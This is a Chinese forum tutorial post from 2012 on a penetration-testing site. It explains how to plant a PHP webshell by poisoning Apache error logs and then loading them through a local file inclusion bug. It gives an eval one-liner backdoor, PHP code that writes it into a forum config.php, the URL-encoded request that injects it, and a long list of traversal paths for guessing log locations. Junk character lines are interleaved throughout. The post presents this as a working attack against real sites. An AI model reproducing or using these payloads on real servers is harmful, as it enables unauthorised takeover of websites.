中国网络渗透测试联盟
标题:
php包含apache日志写马
[打印本页]
作者:
admin
时间:
2012-9-15 14:27
标题:
php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
+ s$ y& r3 ~" x
6 f) w. l8 z1 s$ ~
比如还是这句一句话木马
) @8 S; V. ~0 s0 x* R* P8 U
<?eval($_POST[cmd]);?>
# }# }" |" {8 [) M% D
, X' P" s3 j+ `' I1 D9 k
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
6 s% }$ b3 o; x$ t5 T- l, `$ }
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
3 q' Z! }, {; H5 d' O1 a! R7 G
+ y. `, Q7 F% ]: K+ G1 {: a1 h
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
* P% v$ t3 r- n- `6 V! M
fclose($fp);?> //在config.php里写入一句木马语句
9 y8 P) b9 e: m* m7 @
3 Y3 A3 c; K# M; y
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
; @. k2 b$ r! e. M+ ?. k" V% Z+ o) L
转换为
T! Q* T! V: x, X3 l E
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
1 j$ x7 D& p, C) Q
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
2 n. T' Q7 e9 K0 {* I
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
. q/ E5 H7 A% n; E/ V7 U
fclose%28%24fp%29%3B%3F%3E
# L. U7 u# ]( n# V
我们提交
, S# ^. @: Z. Z1 t+ e1 S7 k$ d
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
2 S, u) L# J6 R
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
+ q+ l7 W6 o& k) s! x: Z9 P) \ J4 V- z
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
$ n. U9 [: N2 L( i9 v
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
5 }1 R% Q2 O; j* r2 s
% k; D6 U5 P3 x9 |7 B
这样就错误日志里就记录下了这行写入webshell的代码。
3 {$ Q7 `! U+ v2 R) A
我们再来包含日志,提交
6 X4 ~$ [7 E+ X: ?! Q6 F5 I
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
" U, [8 D Z; R$ x
' b1 f9 E2 J& }7 \
这样webshell就写入成功了,config.php里就写入一句木马语句
8 F @. ?2 @9 V" j: G
OK.
5 Y4 r$ T$ j Z$ z3 ^( R
http://www.xxx.com/forum/config.php
这个就成了我们的webshell
' B w+ P( }* U' G: G9 S" g- E8 m
直接用lanker的客户端一连,主机就是你的了。
5 C7 K7 P! O: t# d$ ^- X* E9 u% m4 G
) O) w$ W2 @% Y8 m* y# h
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
, W6 a3 O0 V7 ]9 p
3 o2 P& t9 Z2 x
其他的日志路径,你可以去猜,也可以参照这里。
1 j# v& r: i8 p) q# S
../../../../../../../../../../var/log/httpd/access_log
9 q8 e- Z$ u! D |+ R1 {% R
../../../../../../../../../../var/log/httpd/error_log
1 i T. p6 n8 u2 `
../apache/logs/error.log
6 w4 Q5 d5 g9 F9 B& I
../apache/logs/access.log
m/ Q+ V; L9 m( ?/ ?
../../apache/logs/error.log
+ O% n! z- s0 ]1 D$ v* z: N
../../apache/logs/access.log
) ?/ E# b9 [- E% O( M# N
../../../apache/logs/error.log
& q4 E% W N, A
../../../apache/logs/access.log
0 y- P$ O$ Z, O6 ?& x4 Z5 }) r; R
../../../../../../../../../../etc/httpd/logs/acces_log
/ I( R# C! o: U5 r9 y
../../../../../../../../../../etc/httpd/logs/acces.log
( U, x( S, q1 \- l
../../../../../../../../../../etc/httpd/logs/error_log
+ `. ]/ o3 Q" i- U
../../../../../../../../../../etc/httpd/logs/error.log
8 K- d# X* `8 {% e# k
../../../../../../../../../../var/www/logs/access_log
5 h. g4 E f, l
../../../../../../../../../../var/www/logs/access.log
! E4 { i; _; X% r. ?
../../../../../../../../../../usr/local/apache/logs/access_log
- O. V: L Z( ?4 a6 |) T
../../../../../../../../../../usr/local/apache/logs/access.log
; c$ z7 F7 D5 }# a9 C) i
../../../../../../../../../../var/log/apache/access_log
" y7 {; ~, t9 e/ V
../../../../../../../../../../var/log/apache/access.log
+ C" h' x+ x+ g1 O, [8 f u+ ~
../../../../../../../../../../var/log/access_log
" r2 I4 {% I% ~& W
../../../../../../../../../../var/www/logs/error_log
4 N0 |6 _$ E* v, }
../../../../../../../../../../var/www/logs/error.log
. w5 ?7 ^8 B7 o9 E3 j* N" I, C
../../../../../../../../../../usr/local/apache/logs/error_log
5 \# Y% L0 ]# k* C# g# v/ w
../../../../../../../../../../usr/local/apache/logs/error.log
8 `- \/ T' o( G1 e( s# N
../../../../../../../../../../var/log/apache/error_log
4 ^3 H3 p _* W5 f
../../../../../../../../../../var/log/apache/error.log
/ v- w/ }- I5 M) a1 D3 o1 S+ \
../../../../../../../../../../var/log/access_log
, F% ]3 {6 ~9 @' o, s" E
../../../../../../../../../../var/log/error_log
+ j: P% q% l, Y- ?: c3 g
/var/log/httpd/access_log
% ^# {: g2 o: j, E
/var/log/httpd/error_log
; o8 a/ l7 M. D7 z/ |" ]2 ?
../apache/logs/error.log
: z- @; `! g/ C& o6 w3 a1 O+ L( j( \; B
../apache/logs/access.log
, n# `+ E7 \. Q8 \ ~
../../apache/logs/error.log
% V8 f& a8 x/ G) L
../../apache/logs/access.log
+ X; Y+ D& w, |+ Z
../../../apache/logs/error.log
# w& C* f' E( j( k' J# H5 m
../../../apache/logs/access.log
# a9 `3 \2 e \: H/ b
/etc/httpd/logs/acces_log
' a, \0 D) |9 N2 C* I
/etc/httpd/logs/acces.log
- E P( b2 d. J! U3 R/ u
/etc/httpd/logs/error_log
3 p3 |- F# |6 e) |4 l% ^
/etc/httpd/logs/error.log
5 m6 O! e8 B0 {7 u6 }4 G4 Z
/var/www/logs/access_log
, F' t* r( B: F' }: c
/var/www/logs/access.log
" G7 p7 J4 ~' _8 V p5 l; N, U7 ^- @
/usr/local/apache/logs/access_log
, J% O5 _0 h$ D) Z
/usr/local/apache/logs/access.log
# K( E# A7 C5 f/ Y- H' n
/var/log/apache/access_log
! g8 y$ i& ]+ Z
/var/log/apache/access.log
0 C( w5 n3 k+ G0 y" R
/var/log/access_log
, ^2 l5 T& w0 _2 z0 P1 n" D! F
/var/www/logs/error_log
! u1 Q$ [9 g! s# ~2 h0 A
/var/www/logs/error.log
& m" [& H$ ~- @; [) A
/usr/local/apache/logs/error_log
, o; b: s6 }& }9 @
/usr/local/apache/logs/error.log
+ S, H# B7 s, |7 _/ g) F, e+ v
/var/log/apache/error_log
, |+ |7 p9 _! o M. d& |5 S
/var/log/apache/error.log
% |) j$ [ u( m3 C. S& z8 A& w
/var/log/access_log
; o o/ {. M$ s
/var/log/error_log
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2